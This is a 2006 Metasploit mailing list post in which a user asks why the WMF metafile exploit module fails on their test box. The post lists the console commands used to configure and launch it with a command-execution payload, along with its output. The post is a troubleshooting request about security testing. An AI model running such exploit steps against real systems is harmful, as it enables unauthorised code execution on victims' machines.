Metasploit mailing list archives
unable to reproduce WMF exploit
From: exceed at email.si (/dev/null)
Date: Tue, 10 Jan 2006 13:02:20 +0100
Sorry for the off-topic... Seems that everybody was able to reproduce the WMF exploit except me :)

Here are the steps I performed:

- use ie_xp_pfv_metafile
- set PAYLOAD win32_exec
- set CMD cmd.exe
- exploit

msf ie_xp_pfv_metafile(win32_exec) > exploit
[*] Waiting for connections to http://192.168.0.1:8080/
[*] HTTP Client connected from 192.168.0.10:1075, sending 1592 bytes of payload...

The file is saved on disk, but when I open the directory in Windows Explorer nothing happens. Well, a few times explorer.exe crashed, but that's all. No cmd.exe execution.

I don't have indexing disabled... I have tried even with the old versions of the exploit, I have tried with Gzip and chunked disabled, I have tried with EXITPROC seh and thread, I used FF, IE and even wget. I don't have DEP enabled, I don't use any AV on my test box...

The most amazing thing: when I try calc.bmp generated by Mr. Moore it works like a charm...

Obviously I am doing something wrong.

____________________
http://www.email.si/